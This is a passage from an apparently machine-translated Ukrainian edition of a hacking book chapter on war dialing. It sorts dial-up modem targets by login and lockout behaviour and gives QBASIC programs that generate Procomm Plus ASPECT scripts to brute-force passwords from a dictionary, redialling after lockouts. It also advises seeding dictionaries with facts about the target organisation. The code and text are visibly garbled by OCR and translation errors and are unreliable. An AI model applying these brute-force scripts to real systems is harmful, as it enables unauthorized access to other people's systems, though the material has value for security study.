робити, якщо ім'я користувача і пароль вгадати не вдається? Тоді слід спробувати атакувати в лоб. Як вже наголошувалося, утиліта Phonesweep містить вбудовані засоби підбору пароля, але не вичерпує всіх можливостей. Можна скористатися іншими засобами, наприклад Login Hacker від ТНС, що є компілятором мови сценаріїв і що включає декілька прикладів таких сценаріїв. Авторам книги доводилося бачити і складні сценарії, написані на мові ASPECT, компанії Procomm Plus. Ці програми тричі намагаються вгадати пароль, Знову встановлюють з'єднання при його розриві цільовою системою і так далі Проте таке втручання для видалених систем небажано і навіть протиправно, якщо ці спроби робляться без згоди власника системи.
Доморослий спосіб: примітивне написання сценаріїв
Після отримання результатів сканування телефонних номерів потрібно систематизувати їх в так звані домени (domain). Як вже наголошувалося, неоціниму допомогу в цьому надасть досвід роботи з різними типами серверів видалених з'єднань і операційних систем. Вибір системи для подальшого проникнення залежить від безлічі чинників, зокрема від того, скільки часу хакер готовий присвятити своїм експериментам, яка смуга пропускання є в його розпорядженні, а також від його інтуїції і професіоналізму в написанні сценаріїв.
Першим важливим кроком на шляху систематизації результатів в цілях тестування є установка з'єднань з виявленими модемами. При цьому потрібно постаратися визначити характеристики з'єднання, щоб потім зуміти згрупувати з'єднання в домени для тестування. Модемне з'єднання можна визначити по декількох істотних ознаках, які і треба постаратися виявити. Приведемо загальний перелік таких ознак.
- Наявність інтервалу очікування або
порогового числа спроб.
- Після перевищення порогового значення
з'єднання більше не використовується.
- З'єднання доступне тільки в певний
годинник.
- Допустимість коректних припущень про
рівень аутентифікації: тобто наявність або відсутність пароля.
- Унікальність методу ідентифікації,
зокрема за принципом запит/відгук (наприклад, з використанням
ідентифікаторів захисту (Security ID).
- Можливість визначення максимального числа
символів у відгуку або паролі.
- Правомочність припущень про наявність
спеціальних або алфавітно-цифрових символів в полі пароля або
ідентифікаторі користувача.
- Можливість отримання додаткової
інформації при введенні різних стандартних комбінацій клавіш, таких як
<Ctrl+c>, <Ctri+z> <?> і тому подібне
- Наявність ідентифікаційних маркерів або їх зміна з моменту перших спроб проникнення, а також інформація, що міститься в них. Це може виявитися корисним при вгадуванні бракуючої інформації або при вирішенні питань соціальної інженерії.
Отримавши цю інформацію, можна приступати до систематизації з'єднань в так звані домени для проникнення по телефонних лініях. Для ілюстрації розглянемо чотири категорії з'єднань або домена для подальшого проникнення. При цьому відразу ж виключимо з розгляду так званий домен ЛДП (легко доступний плід). Решта доменів заснована на різних механізмах аутентифікації і обмеженні числа спроб доступу до цих механізмів. В цілому домени можна класифікувати таким чином.
1. ЛДП
|
Легко вгадувані і часто використовувані паролі для ідентифікації (вгадати їх допоможе досвід)
|
2. Одинарна ідентифікація, необмежене число спроб
|
Системи з одним типом пароля або ідентифікатора користувача. Модем не відключається після заданого числа невдалих спроб установки з'єднання
|
3. Одинарна ідентифікація, обмежене число спроб
|
Системи з одним типом пароля або ідентифікатора користувача. Модем відключається після заданого числа невдалих спроб установки з'єднання
|
4. Подвійна ідентифікація, необмежене число спроб
|
Системи з двома типами механізмів аутентифікації, наприклад з використанням ідентифікатора користувача і пароля. Модем не відключається після заданого числа невдалих спроб установки з'єднання
|
5. Подвійна ідентифікація, обмежене число спроб
|
Системи з двома типами механізмів аутентифікації, наприклад з використанням ідентифікатора користувача і пароля. Модем відключається після заданого числа невдалих спроб установки з'єднання
|
В цілому чим нижче в списку знаходиться домен, тим складніше проникнути в систему, що відноситься до нього, і тим більше складні сценарії потрібно для цього застосовувати. Розглянемо ці домени докладніше.
Легко доступний плід
Для проникнення
в систему, що відноситься до цього домена, потрібний мінімум зусиль. Якщо хакер удачливий — його неминуче чекає успіх. Для проникнення в систему не потрібно писати ніяких сценаріїв — потрібно лише вгадати ідентифікатор користувача або пароль. У книзі не можна перерахувати всі типові ідентифікатори і паролі. Вгадати цю інформацію допоможе досвід і інтуїція. Хорошою відправною крапкою в цьому процесі може послужити ідентифікація підпису. У таблиці. 10.3 наступного розділу приводиться корисний список, з якого можна почати подальші дослідження. Проте яким би списком не скористався читач, головне — швидко перевірити всі вживані за умовчанням варіанти і у разі невдачі перейти до наступного типу домена.
Одинарна ідентифікація, неофаніченноє число спроб
Це перший серйозний домен (ЛДП не в рахунок), який часто найважче ідентифікувати. Річ у тому, що багато систем, які, на перший погляд, належать цьому домену (лістинг 9.1 А), після введення коректного ідентифікатора вимагають повторної аутентифікації (лістинг 9.1 Би). Приклад системи, що дійсно відноситься до цієї категорії, наводиться в лістингу 9.2. Ця система використовує один механізм аутентифікації і допускає
необмежене число спроб установки з'єднання.
Лістинг 9.1а. Приклад системи, яка, на перший погляд, відноситься до першого домена, але міняє свою поведінку після введення коректного ідентифікатора користувача або пароля
Xx-jul-xx 09:51:08 91ХХХ5551234 З: CONNECT 9600/arq/v32/lapm
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
Лістинг 9.1 Б. Прімер зміни поведінки системи після введення коректного ідентифікатора
користувача або пароля
Xx-jul-xx 09:55:08 91ХХХ5551234 З: CONNECT 9600/arq/v32/lapm
@ Userid: lanroverl
Password: xxxxxxxx
У наступному прикладі система дійсно відноситься до першого домена, оскільки для діставання доступу до неї потрібно тільки ввести пароль. Відмітимо також, що ця система допускає необмежене число спроб установки з'єднання. Для проникнення в таку систему потрібно запустити сценарій підбору пароля.
Лістинг
9.2. Приклад поведінки системи, що дійсно відноситься до першого домена
Xx-jul-xx 03:45:08 91ХХХ5551235 З: CONNECT 9600/arq/v32/lapm
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Для проникнення в систему, представлену в даному прикладі, потрібно написати сценарій, який виконувався б простими утилітами DOS. Приведений нижче фрагмент — це не складна програма, а простий приклад сценарію, що повторює спроби реєстрації до тих пір, поки не буде вичерпаний його словник. Як вже наголошувалося, при написанні сценаріїв для модемних з'єднань найчастіше застосовується програма Procomm Plus з вбудованою мовою сценаріїв ASPECT. Система Procomm Plus відома вже протягом багатьох років і добре зарекомендувала себе при тестуванні як на ранніх версіях DOS, так і на новітніх версіях 32-розрядних операційних систем. Слід зазначити також прекрасну довідкову систему і документацію по мові ASPECT.
Спершу створимо початковий файл сценарію, а потім скомпілюємо його в об'єктний модуль. Отриманий модуль протестуємо на 10-20 паролях, а потім на великому словнику. Таким чином, спочатку створимо файл початкової коди сценарію на мові ASPECT. У старих версіях Procomm Plus для початкових файлів сценаріїв використовувалося розширення .ASP, а для об'єктних файлів — .ASX, а в нових версіях — .WAS і .wsx відповідно. Проте незалежно від версії нам належить створити сценарій, який підтримуватиме приведений вище діалог і користуватиметься великим словником паролів.
Написання сценаріїв
— це програмування порівняльне низького рівня. Їх можна писати за допомогою будь-якого стандартного редактора. Відносно складним моментом є включення в сценарій змінної, що відповідає за прочитування пароля із словника. Система Procomm Plus підтримує включення в сценарій змінних, що відповідають за прочитування даних із зовнішніх файлів (наприклад, із словника) в процесі роботи сценарію. Проте досвід авторів показує, що при включенні словника в текст сценарію зменшується число програмних змінних і зростає вірогідність успіху.
Оскільки основне
завдання — написання сценарію низького рівня, заснованого на застосуванні ASCII-кодов, для його створення можна скористатися мовою QBASIC для DOS. У наступному лістингу приводиться вміст простого QBASIC-файла, що генерує сценарій обробки ситуації з попереднього прикладу. Назвемо цей файл 5551235.ВАЗ (.ваз — стандартне розширення для програм на мові QBASIC). Цю програму можна використовувати для створення сценарію проникнення в систему, що відноситься до першого домена. Ця програма створює початковий файл сценарію на мові ASPECT для Procomm Plus 32 (.WAS). Для повноти сценарію необхідно спочатку створити елемент з'єднання 5551235 у відповідному каталозі Procomm Plus. Елемент з'єднання зазвичай містить всі характеристики з'єднання і дозволяє користувачеві задати файл журналу. Як буде видно з подальшого викладу, наявність журналу дуже важлива при реалізації описуваного підходу.
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS tl
PRINT #2, "proc main"
PRINT #2, "dial DATA " + Chr$(34)+ "5551235" + Chr$(34)
DO UNTIL EOF(l)
LINE INPUT #1, in$
ins = Ltrim$(in$)+ "ЛМ"
PRINT #2, "waitfor " + Chr$(34)+ " Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ ins + Chr$(34)
LOOP
PRINT #2, "endproc"
Файл словника може містити будь-яку кількість типових паролів, наприклад:
apple applel apple2 applepie applepies applepiesl applepies2 applicate applicates application applicationl applonia applonial
і
так далі
Розмір словника може бути будь-яким, тут можна проявляти будь-яку творчість. Якщо відома яка-небудь конкретна інформація про цільову організацію, наприклад імена співробітників або назва місцевої спортивної команди, то в словник слід додати і її. Головне, створити якомога ефективніший словник.
Потім потрібно узяти готовий файл 5551235.WAS, скомпілювати його з використанням компілятором мови ASPECT і запустити на виконання.
Оскільки сценарій
призначений для підбору паролів, перед початком його виконання потрібно відкрити файл журналу реєстрації подій. Тоді весь процес роботи сценарію фіксуватиметься у файлі. Пізній вміст файлу журналу можна проаналізувати і визначити правильний пароль. На перший погляд, може здатися, що журнал реєстрації зовсім не потрібний. Досить просто виконувати сценарій до успішної спроби (отримання коректного пароля). Проте це неможливо, оскільки заздалегідь не можна визначити, що відбудеться після введення коректного пароля, тобто не можна сформулювати умову успішної спроби. Якщо ж відомо, до якого результату повинен привести введення коректного пароля, то у файлі сценарію на мові ASPECT можна використовувати умову WAITFOR і задати відповідну умову. При такому підході залишається менше шансів для випадковостей. Автори є прихильниками журналів реєстрації. Хоча такі журнали складно аналізувати — їх легко створювати. При цьому, звичайно, передбачається, що додаткові відомості про з'єднання відсутні. Ті, хто працював консультантом по безпеці або аудитором і співробітничав з людьми, що знають характеристики видалених з'єднань своїх організацій, можуть використовувати зовсім інші підходи.
Слід згадати ще про деякі особливості роботи сценаріїв. Наявність шуму на лінії між очікуваними символами може звести нанівець всю роботу сценарію. Тому, перш ніж запускати сценарій в дію, бажано кілька разів протестувати його на невеликих словниках з 10-20 паролів і упевнитися в його працездатності.
Одинарна ідентифікація, обмежене число спроб
Для проникнення
в систему, що відноситься до другого типу доменів, потрібний дещо більше часу, оскільки в сценарій потрібно додати нові елементи. Приклад роботи такої системи приведений в лістингу 9.3. Нескладно відмітити невеликі відмінності в поведінці цій і розглянутої вище системи першого типу. У даному прикладі після третьої спроби установки з'єднання з'являється повідомлення АТНО. Це типова послідовність символів, що означає розривши з'єднання для модемів Hayes. Значить, дане з'єднання розривається після трьох невдалих спроб аутентифікації. Число спроб може варіюватися, проте в даному прикладі буде показано, як відновити з'єднання при його розриві після X (у даному прикладі 3-х) невдалих спроб. Для цього потрібно додати невеликий фрагмент коди в розглянутий вище сценарій. Такий приклад міститься в лістингу 9.4. Тут робиться три спроби вгадати пароль, а потім з'єднання встановлюється знову і процес повторюється.
Лістинг
9.3. Приклад поведінки системи, що відноситься до другого типу домена
Xx-jul-xx 03:45:08 91ХХХ5551235 С:connect 9600/arq/v32/lapm
Enter Password: Invalid Password.
Enter Password:
Invalid Password.
Enter Password:
Invalid Password.
ATHO
(Відзначимо
важливу характеристику — послідовність АТНО, що свідчить про розрив з'єднання модему Hayes.)
Лістинг 9.4. Приклад програми на мові QBASIC (файл 5551235.BAS)
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(l)
PRINT #2, "dial DATA " + Chr$(34)
+ "5551235" + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "^m"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "^м"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ - Ltrim$(in$)+ "^м"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LOOP
PRINT #2, "endproc"
Подвійна ідентифікація, необмежене число спроб
До третього типу доменів часто відносяться системи, які, на перший погляд, можна прийняти за системи першого домена. Проте для проникнення в систему третього домена потрібно вгадати не тільки ідентифікатор користувача, але і пароль. Тому проникнення в таку систему займає більше часу, чим в системи з розглянутих вище доменів. Сценарій проникнення в таку систему зазвичай складніший, оскільки вимагає передачі не одній, а двох коректних рядків. При цьому можливі значно більше помилок. Такий сценарій нагадує розглянуті вище приклади. Приклад поведінки системи, що відноситься до третього домена, приведений в лістингу 9.5, а програма на мові QBASIC для створення сценарію ASPECT — в лістингу 9.6.
Лістинг
9.5, Приклад поведінки системи, що відноситься до третього типу домена
Xx-jcl-xx 09:55:08 91ХХХ5551234 З: CONNECT 9600/arq/v32/lapm
Userr.ame: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Лістинг 9.6. Приклад програми на мові QBASIC (файл 5551235.ВАS)
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
PRINT
12, "dial DATA " + Chr$(34)+ "5551235" + Chr$(34)
DO UNTIL EOF(l)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+
"ЛМ" PRINT #2, "waitfor " + Chr$(34)+ " Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ " guest" '+ Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ " Password:" + Chr$(34)
PRINT tt2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LOOP
PRINT #2, "endproc"
Подвійна ідентифікація, обмежене число спроб
Четвертий домен є розвитком третього. Доячи проникнення в систему четвертого домена потрібно вгадати ім'я користувача і пароль при обмеженому числі спроб. Після невдалого використання заданого числа спроб потрібно відновити розірване з'єднання. Розглянемо приклад роботи системи і програму генерації відповідного сценарію. У наступному лістингу містяться результати атаки цільової системи.
Xx-jul-xx 09:55:08 91ХХХ5551234 З: CONNECT 9600/arq/v32/lapm
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: gues.t
Password: xxxxxxxx
+++
А
ось приклад QBASIC-программы, що генерує сценарій на мові ASPECT.
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(l)
PRINT #2, "dial DATA " + Chr$(34)+ "5551235" + Chr$(34)
LINE INPUT #1, in$
in$ = LTRIMS(in$)+ "ЛМ"
PRINT #2, "waitfor " + Chr$(34)+ " Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ " guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ " Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+
"ЛМ" PRINT #2, "waitfor " + Chr$(34)+ " Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ " guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ " Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + CHRS(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "AM"
PRINT #2, "waitfor " + Chr$(34)+ " Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ " guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ " Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LOOP
PRINT #2, "endproc"
|